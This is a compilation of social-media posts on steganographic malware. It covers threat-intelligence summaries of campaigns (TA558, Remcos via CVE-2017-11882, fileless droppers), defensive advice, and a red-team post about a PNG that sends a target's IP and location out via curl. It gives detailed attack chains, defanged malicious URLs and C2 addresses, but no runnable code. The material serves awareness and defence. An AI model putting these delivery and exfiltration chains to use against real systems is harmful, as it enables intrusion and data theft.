Steganography in Cybersecurity

𝗗𝗶𝗱 𝘆𝗼𝘂 𝗸𝗻𝗼𝘄 𝗰𝘆𝗯𝗲𝗿𝗰𝗿𝗶𝗺𝗶𝗻𝗮𝗹𝘀 𝗰𝗮𝗻 𝗵𝗶𝗱𝗲 𝗺𝗮𝗹𝘄𝗮𝗿𝗲 𝗶𝗻 𝗽𝗹𝗮𝗶𝗻 𝘀𝗶𝗴𝗵𝘁—𝘄𝗶𝘁𝗵𝗶𝗻 𝘀𝗲𝗲𝗺𝗶𝗻𝗴𝗹𝘆 𝗶𝗻𝗻𝗼𝗰𝗲𝗻𝘁 𝗶𝗺𝗮𝗴𝗲𝘀 𝗵𝗼𝘀𝘁𝗲𝗱 𝗼𝗻 𝗽𝗹𝗮𝘁𝗳𝗼𝗿𝗺𝘀 𝗹𝗶𝗸𝗲 𝗜𝗺𝗴𝘂𝗿 𝗼𝗿 𝗜𝗺𝗴𝗯𝗼𝘅? Steganographic malware attacks are a growing cyber threat. Here’s how they work:  1. The attacker sends a phishing email containing an Excel file with a malicious VBA script.  2. Once opened, the script executes a PowerShell command to download images from hosting services.  3. These images contain encrypted payloads, extracted using steganography techniques like Base64 decoding and AES decryption.  4. The final payload is executed, compromising the victim’s system.  𝗛𝗼𝘄 𝘁𝗼 𝗣𝗿𝗼𝘁𝗲𝗰𝘁 𝗔𝗴𝗮𝗶𝗻𝘀𝘁 𝗜𝘁:   - Train employees to recognize phishing emails and avoid opening suspicious attachments.  - Use advanced email filters to block malicious attachments.    - Deploy endpoint detection and response (EDR) tools to monitor suspicious scripts like PowerShell.  - Regularly patch systems and software to close vulnerabilities.  - Implement strict access controls and network segmentation to limit damage from an attack.  What additional measures can organizations take to combat such covert threats?  #CyberSecurity #Steganography #Malware #Phishing #ThreatDetection #InfoSec #DataProtection #CyberThreats

We are observing widespread and sophisticated fileless malware campaigns targeting companies in the African finance and telecommunications sectors. The campaign typically begins with a phishing email sent to departments such as Sales and Procurement, often disguised as a Request for Quotation (RFQ). The email includes an attachment, commonly a PowerShell (.ps1) dropper file crafted to appear legitimate. In one notable case, the dropper, once executed, downloaded what appeared to be a random image file onto the user’s system. At first glance, the image seemed harmless, but its huge file size raised suspicion. Further analysis revealed the file contained a malicious DLL hidden using steganography. The attackers concealed binary malware within the image file. The dropper extracted this hidden payload and executed it in memory. It also created a scheduled task via Windows Task Scheduler, ensuring persistence even after reboot. The DLL was executed using in-memory .NET assemblies and PowerShell one-liners, avoiding detection by traditional antivirus solutions. Once active, the payload could accept commands from a remote C2 server, launch processes, and exfiltrate sensitive system information. The malware was observed collecting public and private IP addresses, geolocation data, a list of scheduled tasks, and basic system metadata (useful for lateral movement or persistence). These behaviours are consistent with advanced fileless malware operations, where attackers minimise their on-disk footprint and rely on living-off-the-land techniques (LOLBins) to evade detection. Indicators of compromise (IoCs) revealed that the email sender, domain, and IPs have previously been reported in malicious activity, including spoofing, credential harvesting, spam, and phishing. This suggests the threat actors are leveraging an established, actively maintained infrastructure. Recommendations for Security Teams - Train employees to recognise phishing tactics such as urgency-driven language, unexpected RFQs, and suspicious attachments. Encourage reporting to IT/security teams. - Configure filtering policies to block or sandbox compressed file types (e.g., .zip, .rar, .tgz) and scripts (.ps1, .js, .vbs) from untrusted senders. - Enable DMARC, SPF, and DKIM enforcement for email to avoid spoofing and spam. - Deploy advanced EDR solutions with behavioural detection to catch in-memory execution, PowerShell abuse, and steganographic payloads. - Monitor for suspicious persistence mechanisms (e.g., unexpected scheduled tasks). - Regularly apply security patches to operating systems, browsers, and office applications. - Restrict execution of unsigned PowerShell scripts via Constrained Language Mode or AppLocker/Defender Application Control. - Monitor outbound connections to detect C2 traffic patterns. - Hunt for anomalous large image files or unusual PowerShell activity in logs. #SOC #ThreatIntelligence #DigitalForensics #Malware #FilelessMalware #Threat

Live usage example of steganography in Red Team operations. Steganography is a method grounded in science, used by attackers or researchers to secretly transmit information by hiding data in digital files (images, audio, or video). In the context of Red Team operations, steganography can be a powerful tool for testing and simulating real-world threats; it also helps evaluate how well a target organization can detect hidden, embedded threats. Our example will be quite striking. One of the most compelling examples of this is hiding commands or scripts within image files. These hidden scripts activate when the image is viewed or processed. Once executed, these commands can retrieve critical information or establish a foothold within the target’s system. In our example, we embedded a request command among pixel values. I simulated a scenario in which an image containing a malicious payload is sent to the target. When the image is opened, it triggers a command to send the target's IP address and location to a tracking server on my localhost via a simple curl request. A standard PNG file now functions as spyware. The hidden script reveals the target's IP address and other metadata by sending a curl request to our server. This method demonstrates how complex attacks can be, as traditional security tools do not typically scan images for embedded code. Even though advanced EDRs have fluid mechanisms in place, additional methods can still provide escape mechanisms. All you need to do is transfer this PNG file with the embedded code to the target system, and how you will infiltrate the decoder into the system is up to your imagination. This is how you can turn a digital image into a tool that can manipulate a target using steganography. Of course, this method can also be used to bypass internet censorship and transfer information. Imagine embedding a text file that you don't want anyone to read into an image and giving the target the pixel range to break it. Be cautious with the images you open, my friends. Enjoy! ^-^ #freedomofinternet #cybersecurity #informationsecurity #dataprivacy #privacy #threatintelligence #threathunting

🛡️ Cybersecurity Alert: Steganography-based Malware Campaign 📢 Excited to share insights into a recent cybersecurity threat discovered by Positive Technologies. Dubbed "SteganoAmor," this campaign orchestrated by threat actor TA558 has raised significant concerns across industries. 🛑 Threat Overview: TA558 has been employing steganography, a technique of concealing malicious payloads within innocuous files, to distribute a slew of malware including Agent Tesla, FormBook, Remcos RAT, LokiBot, GuLoader, Snake Keylogger, and XWorm. 🔍 Modus Operandi: The group embeds VBSs, PowerShell code, and RTF documents with exploits inside images and text files, camouflaging them as innocent attachments like "greatloverstory.vbs" and "easytolove.vbs." 🎯 Targeted Sectors: While primarily aimed at industrial, services, public, electric power, and construction sectors in Latin America, companies in Russia, Romania, and Turkey have also fallen victim. 🔥 Phishing Vector: Recently, TA558 has been deploying Venom RAT via phishing emails targeting enterprises across Spain, Mexico, the United States, Colombia, Portugal, Brazil, Dominican Republic, and Argentina. 🚨 Malware Delivery Chain: The attack typically starts with a phishing email containing a booby-trapped Microsoft Excel attachment exploiting CVE-2017-11882 to download malicious payloads from paste[.]ee. 🛡️ Countermeasures: Organizations are urged to reinforce email security measures, patch vulnerabilities promptly, and enhance employee awareness to thwart such attacks. 🔗 Connections to Other Threat Groups: Notably, there are potential links to another hacking group named YoroTrooper (aka SturgeonPhisher), as indicated by victim geography and malware artifacts. 🔒 Stay Vigilant: In the face of evolving cyber threats, continuous monitoring, robust defenses, and proactive measures are imperative to safeguard sensitive data and critical infrastructure. Let's stay vigilant and resilient against cyber adversaries. Your cybersecurity is our priority! #Cybersecurity #Steganography #MalwareThreat #PhishingAttacks #StaySafeOnline

A 2MB PNG file hid malware — delivered through a Teams vishing attack. At a recent AISI - Expert Cybersécurité, Infrastructure & Gouvernance talk, they shared an incident response case that stood out. The attacker: 1/ Used Microsoft Teams for a vishing call 2/ Convinced the target to download a file (part of the pretext), also work with ClickFix attacks 3/ Hid the malware inside a 2MB PNG using steganography. Result? The payload sat on disk while scanners looked the other way. This isn’t brand new, but it’s unusual. And dangerous. Why? Because it blends the familiar (Teams calls, PNG files) with a technique that most defenses aren’t tuned to catch. Attackers don’t need to invent something radical. They just need to combine what works in unexpected ways. Great talk Maminiaina RABAKOSON! (Image source: ANY.RUN on PDF Steganography)

🌟 Pleased to announce the release of the second part of my Understanding Malware Patching series! This time, we talk about Application Resources as a malicious vector. The lengthy article is accompanied by a bonus project that demonstrates how a threat actor could leverage genuine Bitmap files to store malicious shellcode. This is achieved through an easy-to-understand steganography technique, encoding the shellcode into bitmap pixels for retrieval and execution. https://lnkd.in/ehH7Cvmw #InfoSec #OffSec #Malware #Microsoft #Windows #DFIR

THREAT CAMPAIGN: HOW REMCOS RAT WAS DEPLOYED VIA A WEAPONIZED DOCUMENT AND STEGANOGRAPHY ℹ️ The Autoriteti Kombëtar për Sigurinë Kibernetike / National Cyber Security Authority of Albania analyzed a malware campaign leveraging steganography and exploiting CVE-2017-11882, a well-known Microsoft Office vulnerability. This malware campaign primarily targeted infrastructures in Albania through a phishing attack distributing a malicious Word document. 📍 ATTACK CHAIN 1. PHISHING EMAIL ◽ A phishing email is sent containing the document Pro+Build_25-020-000009[.]docx. 2. DOCX OPENED ◽ A hidden command is executed in the background. 3. DOWNLOADED .DOC ◽ Once the document is opened, it automatically downloads another .doc document from: hxxps[:]//kutt[.]ar-email[.]com[.]br/WYMDyt?&syria 4. CVE-2017-11882 ◽ The downloaded document exploits CVE-2017-11882 (Microsoft Word Remote Code Execution vulnerability - RCE). 5. ARBITRARY COMMAND FROM HTA ◽ Arbitrary commands from an HTA file inside the .doc file are executed. 6. DOWNLOAD GIF ◽ The HTA file downloads a GIF from 74[.]208[.]123[.]191, renames it to .vbs, and saves it in %APPDATA%. 7. VBS SCRIPT ◽ The VBS script executes and starts PowerShell, which: - Downloads image[.]jpg from 67[.]217[.]247[.]193. - Uses steganography to extract the payload. - Loads the extracted payload using PowerShell Reflection. 8. "VAI" FUNCTION ◽ The VAI function is invoked from Task Scheduler, executing with string parameters: Remcos Payload encoded[.]txt and Caspol[.]exe. 9. CASPOL[.]EXE ◽ The Remcos shellcode is injected into Caspol[.]exe. 10. C&C EXFILTRATION ◽ The Remcos Trojan exfiltrates all sensitive data to the C2 server at 216[.]9[.]225[.]75 (VPS). PDF: https://lnkd.in/d6_iCj9K #threathunting #threatdetection #threatanalysis #threatintelligence #cyberthreatintelligence #cyberintelligence #cybersecurity #cyberprotection #cyberdefense

Our latest cyber threat research at CYFIRMA reveals a complex stego-campaign, showcasing a malicious .docx file that's raising serious concerns in the cybersecurity landscape. Our dedicated team unearthed a sophisticated attack chain that employs template injection, effectively bypassing conventional email security measures. The malicious .docx file, distributed possibly through phishing emails, sets off a multi-stage attack upon opening. The attack involves the deployment of the Remcos Remote Access Trojan (RAT) and the notorious Agent Tesla malware, each with its set of malicious functionalities. Notably, the document, seemingly benign on the surface, contains a targeted approach, hinting at a potential focus on Taiwan.   Our research dives deep into the sophisticated process, unraveling the use of Visual Basic and PowerShell scripts, legitimate binaries like "RegAsm" and "WinRm," and the exploitation of the Equation Editor Vulnerability (CVE-2017-11882). The attack showcases a high level of sophistication, utilizing Living Off the Land Binary (LoLBin) binaries to accomplish malicious objectives. As we consistently monitor emerging threats, our team unveiled similar samples with a common upload date, indicating a coordinated effort rather than random activity. This underlines the possibility of a purposeful campaign orchestrated by threat actors.   Our commitment at CYFIRMA is to anticipate and scrutinize evolving cyber threats, providing insights to fortify the cybersecurity landscape. The detailed report sheds light on the entire attack chain, emphasizing the need for proactive measures against such advanced threats.   #CyberThreat #MalwareResearch #StegoCampaign #CyberSecurity #ThreatIntelligence #CyfirmaInsights #Remcos RAT #AgentTesla #Malicious.docx #CyfirmaResearch #Cyfirma #ExternalThreatLandscapeManagement #ETLM